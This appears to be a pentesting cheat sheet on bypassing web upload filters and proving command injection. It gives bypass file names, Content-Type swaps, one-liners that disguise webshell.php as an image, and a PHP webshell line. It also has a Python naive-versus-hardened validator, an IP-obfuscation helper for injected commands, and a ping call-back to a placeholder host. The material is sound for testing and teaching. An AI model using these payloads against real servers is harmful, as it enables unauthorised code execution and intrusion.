User Endpoints

File Upload Filtering

Executable extensions

Whether any of these actually executes depends on the server's handler configuration (Apache AddHandler/AddType or a FilesMatch block, IIS handler mappings, the servlet container's mappings), so the less common variants are worth trying against a filter that only denies the obvious ones.

.php -> Standard extension for PHP scripts.

.php5 -> Legacy extension for PHP 5 scripts; still mapped to the PHP handler in some configurations.

.phtml -> Alternative PHP extension, often kept mapped for compatibility with older applications.

.pht -> Less common PHP extension; sometimes mapped to the handler and missed by naive deny-lists.

.phps -> Normally mapped to PHP source highlighting rather than execution, but deny-lists written for .php frequently miss it.

.php3 -> Extension for old PHP 3 scripts; still handled as PHP in some configurations.

.asp -> Classic Active Server Pages, Microsoft's server-side scripting technology on IIS.

.aspx -> ASP.NET Web Forms pages, used for dynamic content on IIS.

.jsp -> JavaServer Pages, used for dynamic web applications on Java servlet containers such as Tomcat.

Test filters

  • A web server normally validates an upload in up to three ways, each comparing the submitted value against an allow- or deny-list. Test each one separately, because a bypass for one says nothing about the others:

  • File extension:

    • Double extensions (beat filters that accept an allowed extension anywhere in the name, or only look at the first dot):

      • .png.php, .jpg.php, .png.asp, .gif.jsp

    • Null byte injection (the filter sees the last extension, the C-level filesystem call stops at the NUL and writes file.php; only works on old stacks, e.g. PHP before 5.3.4):

      • file.php%00.jpg, file.asp%00.png

  • Content-Type headers (the Content-Type of the multipart part is set by the client, so changing it costs nothing):

    • Executable types a deny-list is likely to block:

      • application/x-php

      • application/x-sh

      • application/x-msdownload

      • application/x-python-code

    • Image types to substitute when the filter trusts the header:

      • image/png, image/jpeg, image/gif, image/bmp, image/svg+xml

    • MIME confusion:

      • text/html instead of application/json

      • text/plain, to get past a filter that only denies known executable types.

  • Magic bytes (file signature): the filter reads the first bytes of the body and compares them against known signatures. Prepending a valid signature defeats this check, but the file still needs an executable extension (or one of the tricks above) to actually run.

PNG:
echo "89504e470d0a1a0a" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.png

JPEG:
echo "ffd8ff" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.jpg

GIF:
echo "47494638" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.gif

PDF:
echo "25504446" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.pdf

ZIP:
echo "504b0304" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.zip

xxd -r -p turns the plain hex string into raw bytes. The GIF value is the ASCII "GIF8" prefix shared by GIF87a and GIF89a, PDF is "%PDF" and ZIP is "PK\x03\x04". Check the result with file(1): it should report the image or document type while the PHP body follows the header intact. PHP echoes the leading bytes verbatim and then executes the script, so the shell still works once the server treats the file as PHP.
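To see why each of the three checks above fails on its own, here is an added example, not code from the original page: a naive upload validator that implements all three checks the weak way, beside a hardened one, with the page's bypass payloads run through both. File names, Content-Type values, payload bytes and the one-line "webshell" standing in for webshell.php are all constructed here; the function names are mine.

```python
"""Upload filter logic: a naive validator beside a hardened one.

Added example (not code from the original page). It models the three checks
above so the bypasses can be tried offline: file names, Content-Type values and
payload bytes are constructed, and the 'webshell' is a constructed one-liner
standing in for webshell.php.
"""
import os
import re
import secrets

# Signatures for the image types the endpoint is meant to accept.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",  # shared prefix of GIF87a / GIF89a
}
ALLOWED_EXT = frozenset(MAGIC)


def naive_extension_ok(filename):
    """Weak check: an allowed extension may appear anywhere in the name."""
    name = filename.lower()
    return any("." + ext in name for ext in ALLOWED_EXT)


def naive_content_type_ok(content_type):
    """Weak check: trusts the Content-Type of the multipart part, which the client sets."""
    return content_type.lower().startswith("image/")


def naive_magic_ok(data):
    """Weak check: only the first bytes are compared, so a prepended signature passes."""
    return any(data.startswith(sig) for sig in MAGIC.values())


def naive_allowed(filename, content_type, data):
    """All three weak checks together: still bypassable with the tricks above."""
    return (naive_extension_ok(filename)
            and naive_content_type_ok(content_type)
            and naive_magic_ok(data))


def server_side_extension(filename):
    """Extension the OS and handler actually see: C string APIs stop at the first
    NUL, and the handler keys on the last extension (Apache mod_mime with
    AddHandler can also fire on intermediate ones, e.g. shell.php.png)."""
    truncated = filename.split("\x00", 1)[0]
    return os.path.splitext(truncated)[1].lstrip(".").lower()


def hardened_allowed(filename, content_type, data):
    """Hardened validator: returns the server-chosen storage name, or None to reject.
    The client's Content-Type is deliberately never consulted."""
    del content_type
    # NUL, control characters and path separators have no business in a file name.
    if re.search(r"[\x00-\x1f/\\]", filename):
        return None
    parts = os.path.basename(filename).lower().split(".")
    # Exactly one extension: rejects shell.png.php, shell.php.png and bare names.
    if len(parts) != 2 or not parts[0]:
        return None
    ext = parts[1]
    if ext not in ALLOWED_EXT:
        return None
    # The signature must match the extension that was claimed, not just any image.
    if not data.startswith(MAGIC[ext]):
        return None
    # A prepended signature still passes here, so the rest of the defence is
    # structural: random server-chosen name, validated extension only, stored
    # outside the web root and served with a fixed Content-Type, never executed.
    return f"{secrets.token_hex(16)}.{ext}"


def run_bypass_matrix():
    """Run the page's bypasses through both validators.
    Returns {case: (naive_accepts, hardened_accepts, extension_the_server_sees)}."""
    shell = b"<?php system($_GET['cmd']); ?>"  # constructed stand-in for webshell.php
    cases = {
        "double extension": ("shell.png.php", "image/png", MAGIC["png"] + shell),
        "null byte": ("shell.php\x00.jpg", "image/jpeg", MAGIC["jpg"] + shell),
        "honest webshell": ("shell.php", "application/x-php", shell),
        "real image": ("cat.png", "image/png", MAGIC["png"] + b"\x00\x00\x00\rIHDR"),
    }
    results = {}
    for label, (name, ctype, data) in cases.items():
        results[label] = (
            naive_allowed(name, ctype, data),
            hardened_allowed(name, ctype, data) is not None,
            server_side_extension(name),
        )
    return results


if __name__ == "__main__":
    for case, (naive, hard, ext) in run_bypass_matrix().items():
        print(f"{case:18} naive={naive!s:5} hardened={hard!s:5} executes as .{ext}")
```

The matrix shows the naive stack accepting both the double-extension and the null-byte payload even though the server will end up with a file whose effective extension is .php, while the hardened version rejects both on the file name alone and only ever stores a file under a name it generated itself.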
Check Input Sanitization/Validation

  • Submit special characters in the request -> !@$%^& and watch for errors, reflected characters or characters that were silently stripped.

  • On Linux, IPv4 addresses can be written in decimal, hex (0x...) or octal form, or with fewer than four parts, because glibc's inet_aton() (used by ping and most network tools) accepts all of these. Useful when dots are blacklisted.
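The following is an added example, not code from the original page, that generates the inet_aton()-style spellings of an address and parses them back with the same rules, so a candidate can be checked before it goes into an injection. It goes beyond the decimal and hex forms mentioned above to octal and the one-, two- and three-part forms, all of which follow the same glibc rule (each part decimal, 0x hex or leading-0 octal; the last part fills the remaining bytes). Function names are mine.

```python
"""Alternative spellings of an IPv4 address accepted by glibc's inet_aton().

Added example, not from the original page. Generates the forms for an address
and parses them back with the same rules inet_aton() applies: each part is
decimal, hex (0x) or octal (leading 0), and 1 to 4 parts are accepted, the last
one covering whatever bytes remain.
"""


def ip_to_int(dotted):
    """'10.10.10.10' -> 168430090"""
    octets = [int(o) for o in dotted.split(".")]
    if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
        raise ValueError(f"not a dotted-quad IPv4 address: {dotted!r}")
    return (octets[0] << 24) | (octets[1] << 16) | (octets[2] << 8) | octets[3]


def int_to_ip(n):
    """168430090 -> '10.10.10.10'"""
    return ".".join(str((n >> s) & 0xFF) for s in (24, 16, 8, 0))


def _strtoul_base0(part):
    """Mimic strtoul(..., 0): 0x prefix -> hex, leading 0 -> octal, else decimal."""
    if part[:2].lower() == "0x":
        return int(part[2:], 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)


def parse_loose_ipv4(text):
    """Parse any inet_aton()-style spelling into the 32-bit integer value."""
    parts = text.split(".")
    if not 1 <= len(parts) <= 4:
        raise ValueError(f"too many parts: {text!r}")
    values = [_strtoul_base0(p) for p in parts]
    # Leading parts are single bytes; the last part spans the bytes that remain.
    remaining_bytes = 5 - len(parts)
    if any(v > 255 for v in values[:-1]) or values[-1] >= 1 << (8 * remaining_bytes):
        raise ValueError(f"part out of range: {text!r}")
    value = 0
    for v in values[:-1]:
        value = (value << 8) | v
    return (value << (8 * remaining_bytes)) | values[-1]


def ip_variants(dotted):
    """Every spelling of a dotted-quad address that inet_aton() accepts."""
    n = ip_to_int(dotted)
    a, b, c, d = (n >> 24) & 0xFF, (n >> 16) & 0xFF, (n >> 8) & 0xFF, n & 0xFF
    return {
        "decimal": str(n),                                   # ping 168430090
        "hex": f"0x{n:x}",                                   # ping 0xa0a0a0a
        "octal": f"0{n:o}",
        "dotted_hex": ".".join(f"0x{o:x}" for o in (a, b, c, d)),
        "dotted_octal": ".".join(f"0{o:o}" for o in (a, b, c, d)),
        "three_part": f"{a}.{b}.{(c << 8) | d}",             # 10.10.2570
        "two_part": f"{a}.{(b << 16) | (c << 8) | d}",       # 10.657930
    }


if __name__ == "__main__":
    for form, text in ip_variants("10.10.10.10").items():
        print(f"{form:13} {text:22} -> {int_to_ip(parse_loose_ipv4(text))}")
```

The round trip through parse_loose_ipv4() is the useful part: if a form survives it, ping and anything else that calls inet_aton() on Linux will resolve it to the same host, so the dot-free spelling can go straight into the injected command.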

Prove the Injection

  • If you find a command injection, test whether the host can establish outbound connections by making it ping a box you control (10.10.10.10 is a placeholder for your listener; + is the URL-encoded space):

ping+10.10.10.10

  • And wait for it with tcpdump on the interface that faces the target (tun0 on a VPN lab):

tcpdump -i tun0 icmp

  • Linux ping runs until killed, so the injected request may hang; that is fine for the proof, the ICMP echo requests arriving at tcpdump are the evidence. No packets usually means egress filtering rather than a failed injection, so try a DNS or HTTP call-back before dropping the finding.
